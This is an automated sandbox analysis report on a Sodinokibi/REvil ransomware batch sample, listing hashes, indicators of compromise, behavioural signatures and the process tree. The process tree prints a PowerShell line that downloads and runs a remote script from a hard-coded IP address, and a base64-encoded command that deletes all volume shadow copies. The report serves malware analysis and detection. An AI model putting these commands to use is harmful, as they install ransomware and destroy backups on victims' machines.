Analysis
-
max time kernel
140s -
max time network
141s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
17-05-2020 02:10
Static task
static1
Behavioral task
behavioral1
Sample
1f8c25780845b838f9e4e236cecde44a.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
1f8c25780845b838f9e4e236cecde44a.bat
Resource
win10v200430
General
-
Target
1f8c25780845b838f9e4e236cecde44a.bat
-
Size
220B
-
MD5
aec4b8da44e26c2a159705665e2fd49d
-
SHA1
24ebd61f5b8568a107ee16f17ae0bc3b07887b00
-
SHA256
79aa8d7a7be4115acea3af97412982e19a243d37031ca75779e0d00d68127701
-
SHA512
102759db61f6c214329230c3730e732d62bf5e114d2f712166bb6a811d93d1e7364bd68b3af95a2ab3dc48d225c28910278d2479a601aa676f6875670f634094
Malware Config
Extracted
http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a
Extracted
C:\114lvu0rh4-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1B02B72883D9A3EB
http://decryptor.cc/1B02B72883D9A3EB
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 908 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe -
Blacklisted process makes network request 153 IoCs
Processes:
powershell.exeflow pid process 1 908 powershell.exe 5 908 powershell.exe 7 908 powershell.exe 9 908 powershell.exe 11 908 powershell.exe 13 908 powershell.exe 14 908 powershell.exe 16 908 powershell.exe 17 908 powershell.exe 19 908 powershell.exe 20 908 powershell.exe 22 908 powershell.exe 24 908 powershell.exe 26 908 powershell.exe 28 908 powershell.exe 30 908 powershell.exe 32 908 powershell.exe 34 908 powershell.exe 35 908 powershell.exe 37 908 powershell.exe 39 908 powershell.exe 40 908 powershell.exe 42 908 powershell.exe 44 908 powershell.exe 45 908 powershell.exe 47 908 powershell.exe 49 908 powershell.exe 51 908 powershell.exe 52 908 powershell.exe 54 908 powershell.exe 55 908 powershell.exe 57 908 powershell.exe 58 908 powershell.exe 60 908 powershell.exe 61 908 powershell.exe 63 908 powershell.exe 64 908 powershell.exe 66 908 powershell.exe 68 908 powershell.exe 70 908 powershell.exe 71 908 powershell.exe 73 908 powershell.exe 75 908 powershell.exe 77 908 powershell.exe 78 908 powershell.exe 80 908 powershell.exe 82 908 powershell.exe 84 908 powershell.exe 86 908 powershell.exe 88 908 powershell.exe 90 908 powershell.exe 92 908 powershell.exe 93 908 powershell.exe 95 908 powershell.exe 96 908 powershell.exe 98 908 powershell.exe 100 908 powershell.exe 101 908 powershell.exe 103 908 powershell.exe 104 908 powershell.exe 106 908 powershell.exe 107 908 powershell.exe 109 908 powershell.exe 111 908 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\114lvu0rh4-read-me.txt powershell.exe File opened for modification \??\c:\program files\AssertWatch.tif powershell.exe File opened for modification \??\c:\program files\DisableTest.midi powershell.exe File created \??\c:\program files\microsoft sql server compact edition\114lvu0rh4-read-me.txt powershell.exe File opened for modification \??\c:\program files\NewCompress.m4a powershell.exe File opened for modification \??\c:\program files\PublishTrace.mp4v powershell.exe File opened for modification \??\c:\program files\ResumeRename.csv powershell.exe File created \??\c:\program files\114lvu0rh4-read-me.txt powershell.exe File opened for modification \??\c:\program files\GrantSkip.vdw powershell.exe File opened for modification \??\c:\program files\SkipUnprotect.inf powershell.exe File opened for modification \??\c:\program files\TestOptimize.jpe powershell.exe File opened for modification \??\c:\program files\UnprotectFind.tif powershell.exe File opened for modification \??\c:\program files\CheckpointBlock.dxf powershell.exe File opened for modification \??\c:\program files\MoveSave.ADTS powershell.exe File opened for modification \??\c:\program files\OptimizeInitialize.pptx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\114lvu0rh4-read-me.txt powershell.exe File opened for modification \??\c:\program files\RemoveFormat.3gp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\114lvu0rh4-read-me.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9a321y0.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1528 wrote to memory of 908 1528 cmd.exe powershell.exe PID 908 wrote to memory of 1804 908 powershell.exe powershell.exe PID 908 wrote to memory of 1804 908 powershell.exe powershell.exe PID 908 wrote to memory of 1804 908 powershell.exe powershell.exe PID 908 wrote to memory of 1804 908 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeBackupPrivilege 844 vssvc.exe Token: SeRestorePrivilege 844 vssvc.exe Token: SeAuditPrivilege 844 vssvc.exe Token: SeTakeOwnershipPrivilege 908 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 908 powershell.exe 908 powershell.exe 908 powershell.exe 1804 powershell.exe 1804 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1f8c25780845b838f9e4e236cecde44a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a');Invoke-PBOOTODBDYZFW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Drops file in System32 directory
- Modifies system certificate store
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1804
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:844